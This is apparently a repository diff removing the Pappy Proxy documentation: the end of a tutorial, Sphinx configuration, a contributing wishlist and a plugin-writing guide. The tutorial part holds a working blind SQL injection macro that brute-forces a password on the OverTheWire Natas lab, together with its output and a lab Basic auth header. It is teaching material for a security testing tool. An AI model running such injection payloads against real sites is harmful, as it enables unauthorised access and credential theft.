<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">check_char</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">pos</span><span class="p">):</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s1">, 1)) = </span><span class="si">%d</span><span class="s1">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s2">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="n">password</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">False</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">True</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">valid_chars</span><span class="p">:</span>
<span class="c1"># Print the current char to the current line</span>
<span class="k">print</span> <span class="n">c</span><span class="p">,</span>
<span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">flush</span><span class="p">()</span>
<span class="c1"># Check the current char</span>
<span class="k">if</span> <span class="n">check_char</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
<span class="c1"># We got the correct char!</span>
<span class="n">password</span> <span class="o">+=</span> <span class="n">c</span>
<span class="c1"># Print it to the screen</span>
<span class="k">print</span> <span class="s1">&#39;&#39;</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> is char </span><span class="si">%d</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;The password so far is </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="c1"># We have to do another round</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">False</span>
<span class="k">break</span>
<span class="k">if</span> <span class="n">done</span><span class="p">:</span>
<span class="c1"># We got through the entire alphabet</span>
<span class="k">print</span> <span class="s1">&#39;&#39;</span>
<span class="k">print</span> <span class="s1">&#39;Done! The password is &quot;</span><span class="si">%s</span><span class="s1">&quot;&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="k">break</span>
</pre></div>
</div>
<p>Then we run it:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W
W is char 1!
The password so far is W
a
a is char 2!
The password so far is Wa
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I
I is char 3!
The password so far is WaI
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H
H is char 4!
The password so far is WaIH
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E
... snip ...
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nh
a b c d e f g h i j k l m
m is char 31!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhm
a b c d e f g h
h is char 32!
The password so far is WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 0
Done! The password is &quot;WaIHEacj63wnNIBROHeqi3p9t0m5nhmh&quot;
pappy&gt;
</pre></div>
</div>
<p>Boom! There it is!</p>
</div>
</div>
<div class="section" id="conclusion">
<h2><a class="toc-backref" href="#id27">Conclusion</a><a class="headerlink" href="#conclusion" title="Permalink to this headline"></a></h2>
<p>That&#8217;s pretty much all you need to get started with Pappy. Make sure to go through the documentation to learn about all the other features that weren&#8217;t covered in this tutorial. Hopefully you didn&#8217;t find Pappy too hard to use and you&#8217;ll consider it for your next engagement.</p>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<h3><a href="index.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">The Pappy Proxy Tutorial</a><ul>
<li><a class="reference internal" href="#getting-set-up">Getting Set Up</a><ul>
<li><a class="reference internal" href="#introduction">Introduction</a></li>
<li><a class="reference internal" href="#getting-started">Getting Started</a></li>
<li><a class="reference internal" href="#installing-pappy-s-ca-cert">Installing Pappy&#8217;s CA Cert</a><ul>
<li><a class="reference internal" href="#installing-the-cert-in-firefox">Installing the Cert in Firefox</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-chrome">Installing the Cert in Chrome</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-safari">Installing the Cert in Safari</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-internet-explorer">Installing the Cert in Internet Explorer</a></li>
</ul>
</li>
<li><a class="reference internal" href="#configuring-your-browser">Configuring Your Browser</a></li>
<li><a class="reference internal" href="#testing-it-out">Testing it Out</a></li>
</ul>
</li>
<li><a class="reference internal" href="#the-tutorial">The Tutorial</a><ul>
<li><a class="reference internal" href="#setting-the-scope">Setting the Scope</a></li>
<li><a class="reference internal" href="#natas-0">Natas 0</a></li>
<li><a class="reference internal" href="#natas-1">Natas 1</a></li>
<li><a class="reference internal" href="#natas-2">Natas 2</a></li>
<li><a class="reference internal" href="#natas-3">Natas 3</a></li>
<li><a class="reference internal" href="#finding-your-passwords-later-how-to-use-filters">Finding Your Passwords Later (How to Use Filters)</a><ul>
<li><a class="reference internal" href="#filters">Filters</a></li>
<li><a class="reference internal" href="#finding-passwords">Finding Passwords</a></li>
</ul>
</li>
<li><a class="reference internal" href="#natas-4">Natas 4</a></li>
<li><a class="reference internal" href="#natas-5">Natas 5</a></li>
<li><a class="reference internal" href="#natas-6">Natas 6</a></li>
<li><a class="reference internal" href="#natas-7">Natas 7</a></li>
<li><a class="reference internal" href="#natas-8">Natas 8</a></li>
<li><a class="reference internal" href="#natas-9">Natas 9</a></li>
<li><a class="reference internal" href="#skip-a-few-natas-15">Skip a few... Natas 15</a></li>
</ul>
</li>
<li><a class="reference internal" href="#conclusion">Conclusion</a></li>
</ul>
</li>
</ul>
<h4>Previous topic</h4>
<p class="topless"><a href="overview.html"
title="previous chapter">The Pappy Proxy</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="pappyplugins.html"
title="next chapter">Writing Plugins for the Pappy Proxy</a></p>
<div role="note" aria-label="source link">
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="_sources/tutorial.txt"
rel="nofollow">Show Source</a></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="pappyplugins.html" title="Writing Plugins for the Pappy Proxy"
>next</a> |</li>
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
>previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

322
docs/source/conf.py
Unescape View File

@ -1,322 +0,0 @@
# -*- coding: utf-8 -*-
#
# Pappy Proxy documentation build configuration file, created by
# sphinx-quickstart on Sat Dec 12 11:17:09 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import pappyproxy
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.join(os.path.abspath('..'), 'pappyproxy'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.ifconfig',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Pappy Proxy'
copyright = u'2015, Rob Glew'
author = u'Rob Glew'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = pappyproxy.__version__
# The full version, including alpha/beta/rc tags.
release = pappyproxy.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['pappyproxy.test**',
'pappyproxy.lists.rst',
'pappyproxy.templates.rst',
'pappyproxy.schema.rst',
'pappyproxy.vim_repeater.rst',
'pappyproxy.certs**',
'pappyproxy.comm**',
# '**config**',
# '**console**',
# '**macros**',
# '**mangle**',
# '**repeater**',
# '**session**',
# '**util**',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'classic'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PappyProxydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PappyProxy.tex', u'Pappy Proxy Documentation',
u'Rob Glew', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pappyproxy', u'Pappy Proxy Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PappyProxy', u'Pappy Proxy Documentation',
author, 'PappyProxy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
def maybe_skip_member(app, what, name, obj, skip, options):
skip_vals = ('__doc__', '__module__', '__weakref__')
if name[0] == '_':
return True
if name in skip_vals:
return True
if obj.__doc__ is None:
return True
if 'NOINDEX' in obj.__doc__:
return True
return False
def setup(app):
app.connect('autodoc-skip-member', maybe_skip_member)

43
docs/source/contributing.rst
Unescape View File

@ -1,43 +0,0 @@
Contributing
************
.. contents:: Table of Contents
:local:
Contributing
============
Want to help out? Awesome! This page will give you some ideas on features you can implement. Make sure to read the docs on `writing plugins <pappyplugins>`_ before starting since most of these features are implemented as plugins
Feature Wishlist
================
This is a wish-list of features that I haven't gotten around to implementing, but could probably be done without too much trouble. I would prefer that you try and implement something via plugin because the core code tends to get changed up pretty regularly. If you build something via plugin, worst case scenario a few API calls break. If you try and implement something in the core, worst case scenario everything changes and your efforts are lost because the function you were modifying doesn't exist any more.
If you need to save data to the disk, just save a JSON object to disk for your plugin. When you submit the pull request, I will make changes to plugin/schema to store the data in the datafile.
Anyways, here's some ideas for things you could implement:
* Creds management
When doing a test, the client may give you a number of usernames/passwords. It would be great if you can implement a system to easily copy/paste usernames and passwords from the console so you don't have to keep opening up creds.txt and copying from there. My suggestion is to add a command to coppy a username or a password and let people tab complete the username.
* Session management
Add a system to manage sessions and easily swap between them. I already started on a sessions class in pappyproxy/sessions.py which might help you get started.
* Scan history for easy findings
Some findings are as simple as checking whether a header exists or not. Implement a pluging to go through history and list off some of the easier to find findings. For example you could search for things like
* Secure/httponly flag not set on cookies (mainly session cookies)
* Lack of HSTS headers
* Pasword fields with auto-complete
* Perform an SSL config check on a host (ie similar functionality to an `ssllabs scan <https://www.ssllabs.com/>`_ without having to go through a website)
Find a library to perform some kind of check for weak ciphers, etc on a host and print out any issues that are found.
* Add a SQLMap button
Make it easy to pass a request to SQLMap to check for SQLi. Make sure you can configure which fields you do/don't want tested and by default just give either "yes it looks like SQLi" or "no it doesn't look like SQLi"
* Additional macro templates
Write some commands for generating additional types of macros. For example let people generate an intercepting macro that does search/replace or modifies a header. Save as much typing as possible for common actions.
* Vim plugin to make editing HTTP messages easier
Implement some functionality to make editing HTTP messages easier. It would be great to have a plugin to automatically add to vim when using the interceptor/repeater to make editing requests easier. Look at burp's request editor and try to implement anything you miss from it.
* Request Diff
Add some way to compare requests. Preferably both a "diff" mode and a "just look at 2 at once" mode. Probably want to implement it as a vim plugin for consistency.
Feel free to contact me with ideas if you want to add something to this list.

26
docs/source/index.rst
Unescape View File

@ -1,26 +0,0 @@
.. Pappy Proxy documentation master file, created by
sphinx-quickstart on Sat Dec 12 11:17:09 2015.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Pappy Proxy's documentation!
=======================================
Contents:
.. toctree::
:maxdepth: 2
overview
tutorial
pappyplugins
contributing
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`

7
docs/source/modules.rst
Unescape View File

@ -1,7 +0,0 @@
pappyproxy
==========
.. toctree::
:maxdepth: 4
pappyproxy

1631
docs/source/overview.rst
View File

File diff suppressed because it is too large Load Diff

449
docs/source/pappyplugins.rst
Unescape View File

@ -1,449 +0,0 @@
Writing Plugins for the Pappy Proxy
***********************************
.. contents:: Table of Contents
:local:
Introduction
============
Are macros not powerful enough? Want to make something reusable? Want to add console commands?! Then you might want to write yourself a plugin. Some quick highlights about plugins:
* Python scripts stored in ``~/.pappy/plugins``
* Can add console commands
* For actions which aren't specific to one project
* Harder to write than macros
Since macros can also use the plugin API, plugins aren't any more powerful than macros (besides adding console commands). However, if you find yourself copying a useful macro to more than one project, it may be worth it to just bind it to some commands, put the script in one place, and stop worrying about copying it around. Plus then you can put it on GitHub for some sweet sweet nerd cred.
Should I Write a Plugin or a Macro?
-----------------------------------
A lot of the time, you can get away with writing a macro. However, you may consider writing a plugin if:
* You find yourself copying one macro to multiple projects
* You want to write a general tool that can be applied to any website
* You need to maintain state during the Pappy session
My guess is that if you need one quick thing for a project, you're better off writing a macro first and seeing if you end up using it in future projects. Then if you find yourself needing it a lot, write a plugin for it. You may also consider keeping a ``mine.py`` plugin where you can write out commands that you use regularly but may not be worth creating a dedicated plugin for.
Plugins Get Merged
------------------
If you write a useful plugin, as long as it isn't uber niche, I'll try and merge it into the core project.
Creating a Plugin
=================
Whenever you make a macro, you'll have to bind some functions to some console commands. To do this, you'll have to define a ``load_cmds`` function in your plugin. This function should take one argument. When the plugin is loaded, this function will be called and the console object will be passed to this function. You can then use ``set_cmds`` and ``add_aliases`` to bind functions to console commands.
Writing a Hello World Plugin
----------------------------
It's probably easiest to explain how to write a plugin by writing one. Here is a simple plugin that defines a ``hello`` command and gives an alias ``hlo`` (we'll go over all the parts in a second)::
## hello.py
def hello_world(line):
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
])
Save this as ``~/.pappy/plugins/hello.py`` and run Pappy. You should have a new ``hello`` command that prints your message::
$ cp hello.py ~/.pappy/plugins/
$ pappy -l
Temporary datafile is /tmp/tmp1Myw6q
Proxy is listening on port 8000
pappy> hello
Hello, world!
pappy> hlo
Hello, world!
pappy>
Awesome! So let's go over the code. Here are the important parts of the code:
* We define a function that we want to call
* We define ``load_cmds(cmd)`` to be called when our plugin is loaded to bind our function to a command
* We use ``cmd.set_cmds`` to set all our commands
* We use ``cmd.add_aliases`` to add aliases for commands
Now let's go over it in detail
Passing Arguments to Your Function
----------------------------------
Each command gets bound to one function which takes one argument. That argument is all the text that was entered after the name of the command in the console. For example if we run ``hello foo bar``, in our function line would be "foo bar". **I suggest using shlex.split(line) to parse multiple arguments**. So let's update our script to take some arguments::
## hello.py
import shlex
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
])
Save your changes and restart pappy to reload the plugin::
$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy> hello
Hello, world!
pappy> hello foo bar baz
Hello, foo, bar, baz!
pappy> hello foo bar "baz lihtyur"
Hello, foo, bar, baz lihtyur!
pappy>
Adding More Aliases
-------------------
So now let's add some more aliases to our command. If we want to add a new alias, we just add another tuple to the list passed into ``cmd.add_aliases``. The first element is the real name of the command (what you set with ``set_cmds``) and the second value is the alias you want to type. So let's make it so we can just type ``ho`` to say hello::
## hello.py
import shlex
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('hello', 'ho'),
])
.. note::
You must use the actual name of the command that you used in ``set_cmds``. You can't "chain" alieases. As a result, in our example we couldn't add the alias ``('hlo', 'ho')`` to add ``ho`` as our alias.
Then reload the plugin::
$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy> ho
Hello, world!
pappy> ho foo bar baz
Hello, foo, bar, baz!
pappy> ho foo bar "baz lihtyur"
Hello, foo, bar, baz lihtyur!
pappy>
Adding Another Command
----------------------
So now let's add a ``robe_and_wizard_hat`` command. To do this, we will define another function, then add another entry in the dict that is passed to ``set_cmds``. The second value in the tuple is the autocomplete function, but we'll get to that later. For now, just put in ``None`` to say we don't have one. We will also add a ``wh`` alias to it::
$ pappy -l
Temporary datafile is /tmp/tmpyl2cEZ
Proxy is listening on port 8000
pappy> wh
I put on my robe and wizard hat
pappy>
Adding Autocompletion
---------------------
You can also define a function to handle autocompletion for your command. In order to do this, you define a function that takes 4 arguments: ``text``, ``line``, ``begidx``, and ``endidx``. From the `Cmd docs <https://docs.python.org/2/library/cmd.html>`_, this is what the arguments mean:
``text`` is the string prefix we are attempting to match: all returned matches must begin with it. ``line`` is the current input line with leading whitespace removed, ``begidx`` and ``endidx`` are the beginning and ending indexes of the prefix text, which could be used to provide different completion depending upon which position the argument is in.
Let's let the user to autocomplete some names in our plugin::
import shlex
_AUTOCOMPLETE_NAMES = ['alice', 'allie', 'sarah', 'mallory', 'slagathor']
def hello_world(line):
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
def put_on_rope_and_wizard_hat(line):
if line:
print '%s puts on their robe and wizard hat' % line
else:
print 'I put on my robe and wizard hat'
def complete_hello_world(text, line, begidx, endidx):
return [n for n in _AUTOCOMPLETE_NAMES if n.startswith(text)]
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, complete_hello_world),
'wizard_hat': (put_on_rope_and_wizard_hat, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('wizard_hat', 'wh'),
])
Then restart and run::
$ pappy -l
Temporary datafile is /tmp/tmp3J97rE
Proxy is listening on port 8000
pappy> hello
alice allie mallory sarah slagathor
pappy> hello allie
Hello, allie!
pappy>
You can't see it, but I hit tab twice after typing hello to get the completions to appear.
Adding Help
-----------
Now let's say we want to add some help to the command so that when the user runs ``help hello`` they get something useful. To do that, just add a docstring to your function::
import shlex
_AUTOCOMPLETE_NAMES = ['alice', 'allie', 'sarah', 'mallory', 'slagathor']
def hello_world(line):
"""
Say hello to the world. Usage: hello [name]
"""
if line:
args = shlex.split(line)
print 'Hello, %s!' % (', '.join(args))
else:
print "Hello, world!"
def put_on_rope_and_wizard_hat(line):
if line:
print '%s puts on their robe and wizard hat' % line
else:
print 'I put on my robe and wizard hat'
def complete_hello_world(text, line, begidx, endidx):
return [n for n in _AUTOCOMPLETE_NAMES if n.startswith(text)]
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'hello': (hello_world, complete_hello_world),
'wizard_hat': (put_on_rope_and_wizard_hat, None),
})
cmd.add_aliases([
('hello', 'hlo'),
('wizard_hat', 'wh'),
])
Using defer.inlineCallbacks With a Command
------------------------------------------
.. note::
If you are using inlineCallbacks, you can't use any functions which are blocking versions of async functions. For example, you cannot use :func:`pappyproxy.http.Request.save` and must instead use :func:`pappyproxy.http.Request.async_deep_save`.
.. note::
This tutorial won't tell you how to use inlineCallbacks in general. Type "twisted inline callbacks" into google to figure out what they are. This is mainly just a reminder to use the ``crochet`` wrapper for console commands and warning you that some functions may return deferreds that you may have to deal with.
Since you're writing a plugin, you'll probably be using functions which return a deferred. And to keep things readable, you'll want to use the ``defer.inlineCallbacks`` function wrapper. Unfortunately, you can't bind async functions to commands. Luckily, there's a library called `crochet <https://pypi.python.org/pypi/crochet>`_ which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let's write a plugin to call :func:`pappyproxy.util.load_reqlist` to print out some requests' hosts. Let's start by pretending it's a normal function::
import shlex
from pappyproxy.util import load_reqlist
def print_hosts(line):
args = shlex.split(line)
reqs = load_reqlist(args[0]) # It's supposed to return a list of requests, right?
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
And we run it::
pappy> print_hosts 1
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/cmd2.py", line 788, in onecmd_plus_hooks
stop = self.onecmd(statement)
File "/usr/local/lib/python2.7/dist-packages/cmd2.py", line 871, in onecmd
stop = func(statement)
File "/home/supahacker/pappy/pappyproxy/console.py", line 15, in catch
func(*args, **kwargs)
File "/home/supahacker/.pappy/plugins/hosts.py", line 7, in print_hosts
for r in reqs:
TypeError: iteration over non-sequence
iteration over non-sequence
pappy>
Iteration over a non-sequence? what? Well, :func:`pappyproxy.util.load_reqlist` doesn't actually return a list of requests. It returns a deferred which returns a list of requests. I'm not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an ``inlineCallbacks`` wrapper on the function and ``yield`` the result of the function. Now it looks like this::
import shlex
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@defer.inlineCallbacks
def print_hosts(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for r in reqs:
print 'The host for request %s is: %s' % (r.reqid, r.host)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'print_hosts': (print_hosts, None),
})
cmd.add_aliases([
])
However, the console assumes that any functions it calls will be blocking. As a result, we need to add the ``crochet.wait_for`` wrapper::
import shlex
import crochet
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
